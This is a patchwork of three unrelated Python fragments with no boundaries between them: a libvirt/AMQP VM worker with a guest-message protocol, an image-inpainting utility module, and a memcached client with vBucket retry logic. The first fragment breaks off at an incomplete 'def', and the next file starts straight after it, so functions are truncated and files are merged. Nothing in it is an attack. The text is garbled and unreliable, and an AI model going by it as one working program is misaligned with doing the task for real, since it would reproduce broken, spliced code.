name = record.name,
message = record.getMessage()
)
# if the record has exc_info and it's not None, add it
# to the message
exc_info = getattr(record, "exc_info", None)
if exc_info is not None:
msg += "\n"
msg += "".join(traceback.format_exception(*exc_info))
color = ""
if record.levelno == logging.DEBUG:
color = colorama.Fore.BLUE
elif record.levelno == logging.WARNING:
color = colorama.Fore.YELLOW
elif record.levelno in [logging.ERROR, logging.CRITICAL, logging.FATAL]:
color = colorama.Fore.RED
elif record.levelno == logging.INFO:
color = colorama.Fore.WHITE
colorized = color + colorama.Style.BRIGHT + msg + colorama.Style.RESET_ALL
return colorized
logging.basicConfig(level=logging.DEBUG)
logging.getLogger("sh").setLevel(logging.WARN)
logging.getLogger().handlers[0].setFormatter(TalusFormatter())
def _signal_handler(signum=None, frame=None):
"""Shut down the running Master worker
:signum: Signal number (e.g. signal.SIGINT, etc)
:frame: Python frame (I think)
:returns: None
"""
logging.getLogger("Slave").info("handling signal")
Slave.instance().stop()
logging.shutdown()
def _install_sig_handlers():
"""Install signal handlers
"""
print("installing signal handlers")
signal.signal(signal.SIGINT, _signal_handler)
signal.signal(signal.SIGTERM, _signal_handler)
class LibvirtWrapper(object):
_lock = None
_conn = None
def __init__(self, log, uri="qemu:///system"):
# self._lock = threading.Lock()
self._uri = uri
self._conn = libvirt.open(self._uri)
self._l_log = log.getChild("LV")
self._can_be_used = threading.Event()
self._can_be_used.set()
self._lock = threading.Lock()
def restart_libvirtd(self):
self._l_log.debug("restarting libvirtd, waiting for lock")
self._can_be_used.clear()
self._l_log.debug("closing connection")
self._conn.close()
self._l_log.info("restarting libvirtd")
# this works better than `/etc/init.d/libvirt-bin restart` for some reason
os.system("/etc/init.d/libvirt-bin stop")
time.sleep(3)
os.system("killall -KILL libvirtd")
time.sleep(3)
os.system("/etc/init.d/libvirt-bin start")
self._l_log.info("sleeping for a bit until libvirt should be up")
time.sleep(10)
self._l_log.info("reconnecting to libvirt")
self._conn = libvirt.open(self._uri)
self._l_log.info("reconnected")
self._can_be_used.set()
def __getattr__(self, name):
if hasattr(self._conn, name):
val = getattr(self._conn, name)
if hasattr(val, "__call__"):
def wrapped(*args, **kwargs):
self._can_be_used.wait(2 ** 31)
return val(*args, **kwargs)
return wrapped
else:
return val
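# The wrapper above proxies attribute access to the underlying libvirt
# connection but gates every call on a threading.Event so callers block while
# libvirtd is being restarted.  A minimal standalone sketch of that pattern
# follows; the names here are illustrative and not part of this codebase, and
# the module-level ``threading`` import is assumed.
class _GatedProxy(object):
    def __init__(self, target):
        self._target = target
        self._gate = threading.Event()
        self._gate.set()               # open by default; clear() to pause callers
    def __getattr__(self, name):
        val = getattr(self._target, name)
        if not callable(val):
            return val
        def wrapped(*args, **kwargs):
            self._gate.wait(2 ** 31)   # block until the gate is re-opened
            return val(*args, **kwargs)
        return wrapped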
class GuestComms(twisted_basic.LineReceiver):
"""Communicates with the guest hosts as they start running. A
twisted LineReceiver.
"""
def connectionMade(self):
self.setRawMode()
self._unfinished_message = None
def rawDataReceived(self, data):
print("RECEIVED SOME DATA!!! {}".format(data))
while len(data) > 0:
if self._unfinished_message is not None:
remaining = self._unfinished_message_len - len(self._unfinished_message)
self._unfinished_message += data[0:remaining]
data = data[remaining:]
if len(self._unfinished_message) == self._unfinished_message_len:
self._handle_message(self._unfinished_message)
self._unfinished_message = None
else:
data_len = struct.unpack(">L", data[0:4])[0]
part = data[4:4 + data_len]
data = data[4 + data_len:]
if len(part) < data_len:
self._unfinished_message_len = data_len
self._unfinished_message = part
elif len(part) == data_len:
self._handle_message(part)
def _handle_message(self, message_data):
part_data = json.loads(message_data)
res = Slave.instance().handle_guest_comms(part_data)
if res is not None:
self.transport.write(res)
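# rawDataReceived above expects length-prefixed frames: a 4-byte big-endian
# length followed by a JSON payload, possibly split across TCP reads.  A hedged
# sketch of how a guest-side sender could frame one message (illustrative only;
# the actual guest code is not part of this file).  ``json`` and ``struct`` are
# already imported at module level.
def _frame_guest_message(message_dict):
    payload = json.dumps(message_dict)
    return struct.pack(">L", len(payload)) + payload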
class GuestCommsFactory(twisted.internet.protocol.Factory):
"""The twisted protocol factory
"""
def buildProtocol(self, addr):
return GuestComms()
class Slave(threading.Thread):
"""The slave handler"""
AMQP_JOB_QUEUE = "jobs"
AMQP_JOB_STATUS_QUEUE = "job_status"
AMQP_JOB_PROPS = dict(
durable=True,
auto_delete=False,
exclusive=False
)
AMQP_BROADCAST_XCHG = "broadcast"
AMQP_SLAVE_QUEUE = "slaves"
AMQP_SLAVE_STATUS_QUEUE = "slave_status"
AMQP_SLAVE_PROPS = dict(
durable=True,
auto_delete=False,
exclusive=False,
)
AMQP_SLAVE_STATUS_PROPS = dict(
durable=True,
auto_delete=False,
exclusive=False,
)
_INSTANCE = None
@classmethod
def instance(cls, amqp_host=None, max_ram=None, max_cpus=None, intf=None, plugins_dir=None):
if cls._INSTANCE is None:
cls._INSTANCE = cls(amqp_host, max_ram, max_cpus, intf, plugins_dir)
return cls._INSTANCE
def __init__(self, amqp_host, max_ram, max_cpus, intf, plugins_dir=None):
"""Init the slave
:param str amqp_host: The hostname of the AMQP server
:param int max_ram: The total amount of usable ram (in MB) for VMs
:param int max_cpus: The total amount of cpu cores available for VMs
:param str intf: The interface to connecto the AMQP server through
:param str plugins_dir: The directory where plugins should be loaded from
"""
super(Slave, self).__init__()
self._max_cpus = max_cpus
self._max_ram = max_ram
# see #28 - configurable RAM/cpus
# of the form:
# {
# "KEY": {
# "lock" : <Semaphore>,
# "value" : <int>,
# },
# }
self._locks = {}
self._lock_init("ram", self._max_ram) # in MB!!
self._lock_init("cpus", self._max_cpus)
self._amqp_host = amqp_host
self._log = logging.getLogger("Slave")
self._plugins_dir = plugins_dir
self._load_plugins()
self._running = threading.Event()
self._slave_config_received = threading.Event()
self._amqp_man = AmqpManager.instance(self._amqp_host)
self._image_man = ImageManager.instance()
self._uuid = str(uuid.uuid4())
self._intf = intf
self._ip = netifaces.ifaddresses(self._intf)[2][0]['addr']
self._hostname = socket.gethostname()
# these will be set by the config amqp message
# see the _handle_config method
self._db_host = None
self._code_loc = None
self._already_consuming = False
self._handlers = []
self._handlers_lock = threading.Lock()
self._total_jobs_run = 0
self._libvirt_conn = None
self._gen_mac_addrs()
self._gen_vnc_ports()
self._libvirtd_can_be_used = threading.Event()
# not restarting, so set it (amqp jobs will wait on it when it's cleared)
self._libvirtd_can_be_used.set()
# restart every thousand vms
self._libvirtd_restart_vm_count = 1000
self._last_vm_started_evt = threading.Event()
self._last_vm_started_evt.set()
def _load_plugins(self):
"""Scan plugins directory, if provided, to discover all modules and load them"""
self._plugins = []
self._log.debug("plugins directory is '{}'".format(self._plugins_dir))
if self._plugins_dir == None:
return
# Find all files with .py extension, and all directories, and attempt to load them as modules
plugins_dir = os.path.abspath(self._plugins_dir)
for f in os.listdir(plugins_dir):
f_path = os.path.join(plugins_dir, f)
module_name, ext = os.path.splitext(f)
if ext != '.py' and not os.path.isdir(f_path):
continue
try:
(mod_fp, pathname, description) = imp.find_module(module_name, [plugins_dir])
mod = imp.load_module(module_name, mod_fp, pathname, description)
self._log.info("imported plugin module {}".format(module_name))
self._plugins.append(mod)
except:
self._log.error("failed to import plugin module {}".format(module_name))
self._emit_plugin_event("init", [self, self._log])
def _emit_plugin_event(self, event, args):
try:
for plugin in self._plugins:
# Find function in module
if hasattr(plugin, 'on_{}'.format(event)):
self._log.debug("calling plugin handler on_{} on {}".format(event, plugin.__name__))
getattr(plugin, 'on_{}'.format(event))(*args)
except BaseException as e:
traceback.print_exc()
def _gen_mac_addrs(self):
self._mac_addrs = Queue()
base = "00:00:c0:a8:7b:{:02x}"
num = 2
for x in xrange(50):
new_mac = base.format(num + x)
ip = ".".join(map(lambda x: str(int(x, 16)), new_mac.split(":")[2:]))
# just testing this out...
sh.arp("-s", ip, new_mac)
self._mac_addrs.put(new_mac)
def _gen_vnc_ports(self):
self._vnc_ports = Queue()
for x in xrange(50):
self._vnc_ports.put(5900 + 5 + x)
def run(self):
self._running.set()
self._log.info("running")
self._amqp_man.declare_exchange(self.AMQP_BROADCAST_XCHG, "fanout")
self._amqp_man.declare_queue(self.AMQP_JOB_QUEUE, **self.AMQP_JOB_PROPS)
self._amqp_man.declare_queue(self.AMQP_JOB_STATUS_QUEUE, **self.AMQP_JOB_PROPS)
self._amqp_man.declare_queue(self.AMQP_SLAVE_QUEUE, **self.AMQP_SLAVE_PROPS)
self._amqp_man.declare_queue(self.AMQP_SLAVE_STATUS_QUEUE, **self.AMQP_SLAVE_STATUS_PROPS)
self._amqp_man.declare_queue(
self.AMQP_SLAVE_QUEUE + "_" + self._uuid,
exclusive=True
)
self._amqp_man.bind_queue(
exchange=self.AMQP_BROADCAST_XCHG,
queue=self.AMQP_SLAVE_QUEUE + "_" + self._uuid
)
self._amqp_man.do_start()
self._amqp_man.wait_for_ready()
self._amqp_man.queue_msg(
json.dumps(dict(
type="new",
uuid=self._uuid,
ip=self._ip,
hostname=self._hostname,
max_ram=self._max_ram,
max_cpus=self._max_cpus,
)),
self.AMQP_SLAVE_STATUS_QUEUE
)
self._amqp_man.consume_queue(self.AMQP_SLAVE_QUEUE, self._on_slave_all_received)
self._amqp_man.consume_queue(self.AMQP_SLAVE_QUEUE + "_" + self._uuid, self._on_slave_me_received)
self._log.info("waiting for slave config to be received")
self._status_update_thread = threading.Thread(target=self._do_update_status)
self._status_update_thread.daemon = True
self._status_update_thread.start()
while self._running.is_set():
time.sleep(0.2)
self._log.info("finished")
def stop(self):
"""
Stop the slave
"""
self._log.info("stopping!")
# logging module does not work from within a signal handler (which
# is where stop may be called from). See
# https://docs.python.org/2/library/logging.html#thread-safety
print("stopping!")
self._amqp_man.stop()
self._running.clear()
for handler in self._handlers:
handler.stop()
# wait for them all to finish!
handler.join()
self._log.info("all handlers have exited, goodbye")
print("all handlers have exited, goodbye")
logging.shutdown()
def cancel_job(self, job):
"""
Cancel the job with job id ``job``
:job: The job id to cancel
"""
for handler in self._handlers:
if handler.job == job:
self._log.debug("cancelling handler for job {}".format(job))
handler.stop()
return
self._log.warn("could not find handler for job {} to cancel".format(job))
# -----------------------
# guest comms
# -----------------------
def handle_guest_comms(self, data):
self._log.info("recieved guest comms! {}".format(str(data)[:100]))
if "type" not in data:
self._log.warn("type not found in guest comms data: {}".format(data))
return "{}"
switch = dict(
installing=self._handle_job_installing,
started=self._handle_job_started,
progress=self._handle_job_progress,
result=self._handle_job_result,
finished=self._handle_job_finished,
error=self._handle_job_error,
logs=self._handle_job_logs,
)
if data["type"] not in switch:
self._log.warn("unhandled guest comms type: {}".format(data["type"]))
return
return switch[data["type"]](data)
def _find_handler(self, job_id, idx):
"""Try to find the handler matching the specified ``job_id`` and ``idx``.
:param str job_id: The id of the job
:param int idx: The index of the job part
:returns: The found job handler or None
"""
found_handler = None
with self._handlers_lock:
for handler in self._handlers:
if handler.job == job_id and handler.idx == idx:
found_handler = handler
return found_handler
def _handle_job_installing(self, data):
"""Handle the installing message from the guest.
:param dict data: The data from the guest
:returns: None
"""
self._log.debug("Handling installing job part: {}:{}".format(data["job"], data["idx"]))
found_handler = self._find_handler(data["job"], data["idx"])
if found_handler is None:
self._log.warn("Could not find the handler for data: {}".format(data))
return
found_handler.on_received_guest_msg("installing")
self._last_vm_started_evt.set()
self._emit_plugin_event("job_installing", args=[data])
def _handle_job_started(self, data):
self._log.debug("handling started job part: {}:{}".format(data["job"], data["idx"]))
found_handler = self._find_handler(data["job"], data["idx"])
if found_handler is None:
self._log.warn("Cannot find the handler for data: {}".format(data))
return
found_handler.on_received_guest_msg("started")
self._emit_plugin_event("job_started", args=[data])
def _handle_job_error(self, data):
self._log.debug("handling job errors: {}:{}".format(data["job"], data["idx"]))
self._emit_plugin_event("job_error", args=[data])
self._amqp_man.queue_msg(
json.dumps(dict(
type="error",
tool=data["tool"],
idx=data["idx"],
job=data["job"],
data=data["data"]
)),
self.AMQP_JOB_STATUS_QUEUE
)
found_handler = self._find_handler(data["job"], data["idx"])
if found_handler is not None:
    found_handler.on_received_guest_msg("error")
def _handle_job_logs(self, data):
self._log.debug("handling debug logs from job part: {}:{}".format(data["job"], data["idx"]))
self._emit_plugin_event("job_logs", args=[data])
self._amqp_man.queue_msg(
json.dumps(dict(
type="log",
tool=data["tool"],
idx=data["idx"],
job=data["job"],
data=data["data"]
)),
self.AMQP_JOB_STATUS_QUEUE
)
def
import os
import torch
import yaml
import numpy as np
from PIL import Image
from skimage import io
import torch.nn.functional as F
def pil_loader(path):
# open path as file to avoid ResourceWarning (https://github.com/python-pillow/Pillow/issues/835)
with open(path, 'rb') as f:
img = Image.open(f)
return img.convert('RGB')
def tif_loader(path):
aDiv = np.array(io.imread(path))
aDivMax = aDiv.max()
aDivMin = aDiv.min()
aDiv = (aDiv - aDivMin) / (aDivMax - aDivMin)
#aDiv = aDiv/aDivMax
h, w = aDiv.shape
aDiv = np.stack([aDiv, aDiv, aDiv], axis=2)
aDiv = np.asarray(aDiv, np.float32)
return aDiv
def default_loader(path):
return pil_loader(path)
#return tif_loader(path)
def tensor_img_to_npimg(tensor_img):
"""
Turn a tensor image with shape CxHxW to a numpy array image with shape HxWxC
:param tensor_img:
:return: a numpy array image with shape HxWxC
"""
if not (torch.is_tensor(tensor_img) and tensor_img.ndimension() == 3):
raise NotImplementedError("Not supported tensor image. Only tensors with dimension CxHxW are supported.")
npimg = np.transpose(tensor_img.numpy(), (1, 2, 0))
npimg = npimg.squeeze()
assert isinstance(npimg, np.ndarray) and (npimg.ndim in {2, 3})
return npimg
# Change the values of tensor x from range [0, 1] to [-1, 1]
def normalize(x):
#return x.mul_(2).add_(-1)
return x.mul_(2).add_(-1)
def transfer2tensor(x):
'''
Transfer a 32-bit TIFF ndarray into a float tensor.
Args:
    x: image array, assumed to hold uint32 intensities
Returns:
    a torch.FloatTensor scaled from the uint32 range
'''
x = np.asarray(x, dtype=np.float32)
x_norm = x / 4294967295  # normalise by the uint32 maximum (2**32 - 1)
x_tensor = torch.from_numpy(x_norm)
x_tensor = x_tensor.float()
#x_tensor = torch.tensor(x_tensor.clone().detach(), dtype=torch.float32)
return x_tensor.mul_(2).add_(-0.6)
def same_padding(images, ksizes, strides, rates):
assert len(images.size()) == 4
batch_size, channel, rows, cols = images.size()
out_rows = (rows + strides[0] - 1) // strides[0]
out_cols = (cols + strides[1] - 1) // strides[1]
effective_k_row = (ksizes[0] - 1) * rates[0] + 1
effective_k_col = (ksizes[1] - 1) * rates[1] + 1
padding_rows = max(0, (out_rows-1)*strides[0]+effective_k_row-rows)
padding_cols = max(0, (out_cols-1)*strides[1]+effective_k_col-cols)
# Pad the input
padding_top = int(padding_rows / 2.)
padding_left = int(padding_cols / 2.)
padding_bottom = padding_rows - padding_top
padding_right = padding_cols - padding_left
paddings = (padding_left, padding_right, padding_top, padding_bottom)
images = torch.nn.ZeroPad2d(paddings)(images)
return images
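# Worked example of the 'same' padding arithmetic above (illustrative): for a
# 1x1x5x5 input with ksizes=[3, 3], strides=[2, 2], rates=[1, 1]:
#   out_rows = (5 + 2 - 1) // 2 = 3, effective_k_row = 3,
#   padding_rows = max(0, (3 - 1) * 2 + 3 - 5) = 2 -> one row on top, one on bottom,
# so the padded tensor is 1x1x7x7.
def _example_same_padding():
    images = torch.zeros(1, 1, 5, 5)
    return same_padding(images, [3, 3], [2, 2], [1, 1]).shape  # (1, 1, 7, 7)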
def extract_image_patches(images, ksizes, strides, rates, padding='same'):
"""
Extract patches from images and put them in the C output dimension.
:param padding:
:param images: [batch, channels, in_rows, in_cols]. A 4-D Tensor with shape
:param ksizes: [ksize_rows, ksize_cols]. The size of the sliding window for
each dimension of images
:param strides: [stride_rows, stride_cols]
:param rates: [dilation_rows, dilation_cols]
:return: A Tensor
"""
assert len(images.size()) == 4
assert padding in ['same', 'valid']
batch_size, channel, height, width = images.size()
if padding == 'same':
images = same_padding(images, ksizes, strides, rates)
elif padding == 'valid':
pass
else:
raise NotImplementedError('Unsupported padding type: {}. '
'Only "same" or "valid" are supported.'.format(padding))
unfold = torch.nn.Unfold(kernel_size=ksizes,
dilation=rates,
padding=0,
stride=strides)
patches = unfold(images)
return patches # [N, C*k*k, L], L is the total number of such blocks
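# Hedged usage sketch for extract_image_patches: with 'same' padding, stride 1
# and no dilation, every spatial position yields one flattened C*k*k patch, so
# L equals H * W below.  Shapes are illustrative.
def _example_extract_patches():
    images = torch.zeros(2, 3, 8, 8)                       # [N, C, H, W]
    patches = extract_image_patches(images, ksizes=[3, 3],
                                     strides=[1, 1], rates=[1, 1])
    return patches.shape                                   # (2, 3*3*3, 8*8) = (2, 27, 64)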
# def random_bbox(config, batch_size):
# """Generate a random tlhw with configuration.
#
# Args:
# config: Config should have configuration including img
#
# Returns:
# tuple: (top, left, height, width)
#
# """
# img_height, img_width, _ = config['image_shape']
# h, w = config['mask_shape']
# margin_height, margin_width = config['margin']
# maxt = img_height - margin_height - h
# maxl = img_width - margin_width - w
# bbox_list = []
# if config['mask_batch_same']:
# t = np.random.randint(margin_height, maxt)
# l = np.random.randint(margin_width, maxl)
# bbox_list.append((t, l, h, w))
# bbox_list = bbox_list * batch_size
# else:
# for i in range(batch_size):
# t = np.random.randint(margin_height, maxt)
# l = np.random.randint(margin_width, maxl)
# bbox_list.append((t, l, h, w))
#
# return torch.tensor(bbox_list, dtype=torch.int64)
def random_bbox(config, batch_size):
"""Generate a random tlhw with configuration.
Args:
config: Config should have configuration including img
Returns:
tuple: (top, left, height, width)
"""
img_height, img_width, _ = config['image_shape']
h, w = config['mask_shape']
margin_height, margin_width = config['margin']
maxt = img_height - margin_height - h
maxl = img_width - margin_width - w
bbox_list = []
if config['mask_batch_same']:
#t = np.random.randint(margin_height, maxt)
#l = np.random.randint(margin_width, maxl)
t = (img_height - h)//2 ## center mask
l = (img_width - w) //2
bbox_list.append((t, l, h, w))
bbox_list = bbox_list * batch_size
else:
for i in range(batch_size):
# t = np.random.randint(margin_height, maxt)
# l = np.random.randint(margin_width, maxl)
t = (img_height - h) // 2 ## center mask
l = (img_width - w) // 2
bbox_list.append((t, l, h, w))
return torch.tensor(bbox_list, dtype=torch.int64)
def test_random_bbox():
image_shape = [256, 256, 3]
mask_shape = [128, 128]
margin = [0, 0]
# random_bbox reads its settings from a config dict; keys mirror those used above
config = {'image_shape': image_shape, 'mask_shape': mask_shape,
'margin': margin, 'mask_batch_same': True}
bbox = random_bbox(config, batch_size=1)
return bbox
def bbox2mask(bboxes, height, width, max_delta_h, max_delta_w):
batch_size = bboxes.size(0)
mask = torch.zeros((batch_size, 1, height, width), dtype=torch.float32)
for i in range(batch_size):
bbox = bboxes[i]
#delta_h = np.random.randint(max_delta_h // 2 + 1)
#delta_w = np.random.randint(max_delta_w // 2 + 1)
delta_h = 0
delta_w = 0
mask[i, :, bbox[0] + delta_h:bbox[0] + bbox[2] - delta_h, bbox[1] + delta_w:bbox[1] + bbox[3] - delta_w] = 1.
return mask
def test_bbox2mask():
image_shape = [256, 256, 3]
mask_shape = [128, 128]
margin = [0, 0]
max_delta_shape = [32, 32]
# random_bbox reads its settings from a config dict; keys mirror those used above
config = {'image_shape': image_shape, 'mask_shape': mask_shape,
'margin': margin, 'mask_batch_same': True}
bbox = random_bbox(config, batch_size=1)
mask = bbox2mask(bbox, image_shape[0], image_shape[1], max_delta_shape[0], max_delta_shape[1])
return mask
def local_patch(x, bbox_list):
assert len(x.size()) == 4
patches = []
for i, bbox in enumerate(bbox_list):
t, l, h, w = bbox
patches.append(x[i, :, t:t + h, l:l + w])
return torch.stack(patches, dim=0)
def mask_image(x, bboxes, config):
height, width, _ = config['image_shape']
max_delta_h, max_delta_w = config['max_delta_shape']
mask = bbox2mask(bboxes, height, width, max_delta_h, max_delta_w)
if x.is_cuda:
mask = mask.cuda()
if config['mask_type'] == 'hole':
#print(x.shape)
#print('Mask ', mask.shape)
result = x * (1. - mask)
elif config['mask_type'] == 'mosaic':
# TODO: Matching the mosaic patch size and the mask size
mosaic_unit_size = config['mosaic_unit_size']
downsampled_image = F.interpolate(x, scale_factor=1. / mosaic_unit_size, mode='nearest')
upsampled_image = F.interpolate(downsampled_image, size=(height, width), mode='nearest')
result = upsampled_image * mask + x * (1. - mask)
else:
raise NotImplementedError('Not implemented mask type.')
return result, mask
def spatial_discounting_mask(config):
"""Generate spatial discounting mask constant.
Spatial discounting mask is first introduced in publication:
Generative Image Inpainting with Contextual Attention, Yu et al.
Args:
config: Config should have configuration including HEIGHT, WIDTH,
DISCOUNTED_MASK.
Returns:
tf.Tensor: spatial discounting mask
"""
gamma = config['spatial_discounting_gamma']
height, width = config['mask_shape']
shape = [1, 1, height, width]
if config['discounted_mask']:
mask_values = np.ones((height, width))
for i in range(height):
for j in range(width):
mask_values[i, j] = max(
gamma ** min(i, height - i),
gamma ** min(j, width - j))
mask_values = np.expand_dims(mask_values, 0)
mask_values = np.expand_dims(mask_values, 0)
else:
mask_values = np.ones(shape)
spatial_discounting_mask_tensor = torch.tensor(mask_values, dtype=torch.float32)
if config['cuda']:
spatial_discounting_mask_tensor = spatial_discounting_mask_tensor.cuda()
return spatial_discounting_mask_tensor
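# Illustrative values of the discounting formula above: with gamma = 0.9 the
# weight at pixel (i, j) is max(gamma**min(i, H - i), gamma**min(j, W - j)),
# so border pixels keep weight 1.0 (0.9**0) while the centre of a 64x64 mask
# drops to roughly 0.9**32 ~= 0.034.  No library calls are assumed here.
def _example_discounting_weight(i, j, height, width, gamma=0.9):
    return max(gamma ** min(i, height - i), gamma ** min(j, width - j))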
def reduce_mean(x, axis=None, keepdim=False):
if not axis:
axis = range(len(x.shape))
for i in sorted(axis, reverse=True):
x = torch.mean(x, dim=i, keepdim=keepdim)
return x
def reduce_std(x, axis=None, keepdim=False):
if not axis:
axis = range(len(x.shape))
for i in sorted(axis, reverse=True):
x = torch.std(x, dim=i, keepdim=keepdim)
return x
def reduce_sum(x, axis=None, keepdim=False):
if not axis:
axis = range(len(x.shape))
for i in sorted(axis, reverse=True):
x = torch.sum(x, dim=i, keepdim=keepdim)
return x
def flow_to_image(flow):
"""Transfer flow map to image.
Part of code forked from flownet.
"""
out = []
maxu = -999.
maxv = -999.
minu = 999.
minv = 999.
maxrad = -1
for i in range(flow.shape[0]):
u = flow[i, :, :, 0]
v = flow[i, :, :, 1]
idxunknow = (abs(u) > 1e7) | (abs(v) > 1e7)
u[idxunknow] = 0
v[idxunknow] = 0
maxu = max(maxu, np.max(u))
minu = min(minu, np.min(u))
maxv = max(maxv, np.max(v))
minv = min(minv, np.min(v))
rad = np.sqrt(u ** 2 + v ** 2)
maxrad = max(maxrad, np.max(rad))
u = u / (maxrad + np.finfo(float).eps)
v = v / (maxrad + np.finfo(float).eps)
img = compute_color(u, v)
out.append(img)
return np.float32(np.uint8(out))
def pt_flow_to_image(flow):
"""Transfer flow map to image.
Part of code forked from flownet.
"""
out = []
maxu = torch.tensor(-999)
maxv = torch.tensor(-999)
minu = torch.tensor(999)
minv = torch.tensor(999)
maxrad = torch.tensor(-1)
if torch.cuda.is_available():
maxu = maxu.cuda()
maxv = maxv.cuda()
minu = minu.cuda()
minv = minv.cuda()
maxrad = maxrad.cuda()
for i in range(flow.shape[0]):
u = flow[i, 0, :, :]
v = flow[i, 1, :, :]
idxunknow = (torch.abs(u) > 1e7) | (torch.abs(v) > 1e7)
u[idxunknow] = 0
v[idxunknow] = 0
maxu = torch.max(maxu, torch.max(u))
minu = torch.min(minu, torch.min(u))
maxv = torch.max(maxv, torch.max(v))
minv = torch.min(minv, torch.min(v))
rad = torch.sqrt((u ** 2 + v ** 2).float()).to(torch.int64)
maxrad = torch.max(maxrad, torch.max(rad))
u = u / (maxrad + torch.finfo(torch.float32).eps)
v = v / (maxrad + torch.finfo(torch.float32).eps)
# TODO: change the following to pytorch
img = pt_compute_color(u, v)
out.append(img)
return torch.stack(out, dim=0)
def highlight_flow(flow):
"""Convert | |
set([self._get_vBucket_id(key)]),
forward_map=self._parse_not_my_vbucket_error(error))
vb_error += 1
else:
raise error
except (EOFError, socket.error) as error:
if "Got empty data (remote died?)" in error.message or \
"Timeout waiting for socket" in error.message or \
"Broken pipe" in error.message or \
"Connection reset by peer" in error.message and vb_error < 5:
self.reset_vbuckets(self.rest,
set([self._get_vBucket_id(key)]))
vb_error += 1
else:
raise error
except BaseException as error:
if vb_error < 5:
self.reset_vbuckets(self.rest, set([self._get_vBucket_id(key)]))
vb_error += 1
else:
raise error
return new_func
# SUBDOCS
@aware_call
def counter_sd(self, key, path, value, expiry=0, opaque=0, cas=0, create=False):
return self._send_op(self.memcached(key).counter_sd, key, path, value, expiry=expiry, opaque=opaque, cas=cas, create=create)
@aware_call
def array_add_insert_sd(self, key, path, value, expiry=0, opaque=0, cas=0, create=False):
return self._send_op(self.memcached(key).array_add_insert_sd, key, path, value, expiry=expiry, opaque=opaque, cas=cas, create=create)
@aware_call
def array_add_unique_sd(self, key, path, value, expiry=0, opaque=0, cas=0, create=False):
return self._send_op(self.memcached(key).array_add_unique_sd, key, path, value, expiry=expiry, opaque=opaque, cas=cas, create=create)
@aware_call
def array_push_first_sd(self, key, path, value, expiry=0, opaque=0, cas=0, create=False):
return self._send_op(self.memcached(key).array_push_first_sd, key, path, value, expiry=expiry, opaque=opaque, cas=cas, create=create)
@aware_call
def array_push_last_sd(self, key, path, value, expiry=0, opaque=0, cas=0, create=False):
return self._send_op(self.memcached(key).array_push_last_sd, key, path, value, expiry=expiry, opaque=opaque, cas=cas, create=create)
@aware_call
def replace_sd(self, key, path, value, expiry=0, opaque=0, cas=0, create=False):
return self._send_op(self.memcached(key).replace_sd, key, path, value, expiry=expiry, opaque=opaque, cas=cas, create=create)
@aware_call
def delete_sd(self, key, path, opaque=0, cas=0):
return self._send_op(self.memcached(key).delete_sd, key, path, opaque=opaque, cas=cas)
@aware_call
def dict_upsert_sd(self, key, path, value, expiry=0, opaque=0, cas=0, create=False):
return self._send_op(self.memcached(key).dict_upsert_sd, key, path, value, expiry=expiry, opaque=opaque, cas=cas, create=create)
@aware_call
def dict_add_sd(self, key, path, value, expiry=0, opaque=0, cas=0, create=False):
return self._send_op(self.memcached(key).dict_add_sd, key, path, value, expiry=expiry, opaque=opaque, cas=cas, create=create)
@aware_call
def exists_sd(self, key, path, cas=0):
return self._send_op(self.memcached(key).exists_sd, key, path, cas=cas)
@aware_call
def get_sd(self, key, path, cas=0):
return self._send_op(self.memcached(key).get_sd, key, path, cas=cas)
@aware_call
def set(self, key, exp, flags, value):
return self._send_op(self.memcached(key).set, key, exp, flags, value)
@aware_call
def append(self, key, value):
return self._send_op(self.memcached(key).append, key, value)
@aware_call
def observe(self, key):
return self._send_op(self.memcached(key).observe, key)
@aware_call
def observe_seqno(self, key, vbucket_uuid):
return self._send_op(self.memcached(key).observe_seqno, key, vbucket_uuid)
# This saves a lot of repeated code - the func is the mc bin client function
def generic_request(self, func, *args):
key = args[0]
vb_error = 0
while True:
try:
return self._send_op(func, *args)
except MemcachedError as error:
if error.status == ERR_NOT_MY_VBUCKET and vb_error < 5:
self.reset_vbuckets(self.rest, set([self._get_vBucket_id(key)]),
forward_map=self._parse_not_my_vbucket_error(error))
vb_error += 1
else:
raise error
except (EOFError, socket.error) as error:
if "Got empty data (remote died?)" in error.message \
or "Timeout waiting for socket" in error.message \
or "Broken pipe" in error.message \
or "Connection reset by peer" in error.message \
and vb_error < 5:
self.reset_vbuckets(self.rest, set([self._get_vBucket_id(key)]))
vb_error += 1
if vb_error >= 5:
raise error
else:
raise error
except BaseException as error:
if vb_error < 5:
self.reset_vbuckets(self.rest, set([self._get_vBucket_id(key)]))
self.log.info("********** Resetting vbucket id **********")
vb_error += 1
else:
raise error
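# Hedged usage sketch (the client/key names below are made up, not taken from
# this file): any memcached binary-client method whose first positional
# argument is the key can be routed through the retry wrapper above, e.g.
#   client.generic_request(client.memcached("doc_1").get, "doc_1")
#   client.generic_request(client.memcached("doc_1").set, "doc_1", 0, 0, "value")
# The key must come first so a NOT_MY_VBUCKET error can be mapped back to its
# vBucket id and the vBucket map refreshed before retrying.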
def get(self, key):
vb_error = 0
while True:
try:
return self._send_op(self.memcached(key).get, key)
except MemcachedError as error:
if error.status == ERR_NOT_MY_VBUCKET and vb_error < 5:
self.reset_vbuckets(self.rest, set([self._get_vBucket_id(key)]),
forward_map=self._parse_not_my_vbucket_error(error))
vb_error += 1
else:
raise error
except (EOFError, socket.error) as error:
if "Got empty data (remote died?)" in error.message \
or "Timeout waiting for socket" in error.message \
or "Broken pipe" in error.message \
or "Connection reset by peer" in error.message \
and vb_error < 5:
self.reset_vbuckets(self.rest, set([self._get_vBucket_id(key)]))
vb_error += 1
else:
raise error
except BaseException as error:
if vb_error < 5:
self.reset_vbuckets(self.rest, set([self._get_vBucket_id(key)]))
vb_error += 1
else:
raise error
def getr(self, key, replica_index=0):
vb_error = 0
while True:
try:
vBucketId = self._get_vBucket_id(key)
return self._send_op(self.memcached(key, replica_index=replica_index).getr, key)
except MemcachedError as error:
if error.status == ERR_NOT_MY_VBUCKET and vb_error < 5:
self.reset_vbuckets(self.rest, set([self._get_vBucket_id(key)]),
forward_map=self._parse_not_my_vbucket_error(error))
vb_error += 1
else:
raise error
except (EOFError, socket.error) as error:
if "Got empty data (remote died?)" in error.message \
or "Timeout waiting for socket" in error.message \
or "Broken pipe" in error.message \
or "Connection reset by peer" in error.message \
and vb_error < 5:
self.reset_vbuckets(self.rest, set([self._get_vBucket_id(key)]))
vb_error += 1
else:
raise error
except BaseException as error:
if vb_error < 5:
self.reset_vbuckets(self.rest, set([self._get_vBucket_id(key)]))
vb_error += 1
else:
raise error
def setMulti(self, exp, flags, key_val_dic, pause_sec=1, timeout_sec=5, parallel=False):
if parallel:
